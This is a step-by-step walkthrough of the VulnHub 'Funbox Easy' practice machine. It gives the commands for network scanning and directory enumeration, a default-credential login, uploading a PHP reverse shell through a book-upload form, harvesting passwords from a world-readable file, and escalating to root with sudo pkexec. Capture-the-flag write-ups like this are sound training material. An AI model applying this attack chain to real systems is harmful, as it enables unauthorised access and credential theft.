https://www.vulnhub.com/entry/funbox-easy,526/
Setting up Target System
- extract the ova file using
tar -xvf Funbox3.ova
, there will be a vmdk file(VMware Disk image) in it - and then convert to qcow2 using
qemu-img convert -p -f vmdk -O qcow2 Funbox3-disk001.vmdk funbox3.qcow2
- create a new vm, using existing image, and import that funbox3.qcow2
- make sure it is using BIOS boot, UEFI didn’t work
Scan Network
Get target IP
nmap -sn 192.168.122.1-255
ping scannetdiscover -P -i eth0 -r 192.168.122.1/24
Scan Ports
nmap -p- -sV -sC 192.168.122.14
Port 80 http is Open
- check the website
- check robots.txt
- Inspect elements
dirb http://192.168.122.14
scan directories- found:
http://192.168.122.14/index.php
http://192.168.122.14/admin/index.php
http://192.168.122.14/store/admin.php
- try default login “admin admin”, and able to get into book store backend
- found:
Website is running PHP, so we can try to use php script to get a reverse webshell
updatedb && locate php-reverse-shell.php
- found
/usr/share/webshells/php/php-reverse-shell.php
- copy it to somewhere else, edit the IP to attacker’s and port to anything
- open a listening port with attacker on that port
ncat -nvlp 314
- add a new book
http://192.168.122.14/store/admin_add.php
and drop in thephp-reverse-shell.php
- Now we have a revese shell when we open the new book
Spawn a better shell
- check if python exist on machine
which python3
- spawn a new bash shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
- now we have a proper bash shell
Now we are in that system shell, gather some info
uname -a
check OS versionwhoami
find out current userid
find user and group id- find out all users on machine, check
/etc/passwd
- check out other user
tony
’s home - found out a
password.txt
file that is readible by all users
Try the passwords
- able to login to
http://192.168.122.14/admin/home.php
withadmin asdfghjklXXX
- able to SSH into the machine with
tony yxcvbnmYYY
SSH into the machine
- check out current user’s group
groups tony
- or
id
- User is in sudoer group
- check all commands for
sudo -l
- try to look up possible privilage esculation from:
https://gtfobins.github.io/
:pkexec
andtime
could worksudo pkexec /bin/bash
will spawn a shell
Capture the Flag
- Now you are in Bash as root, go to
/root
cat /root/root.flag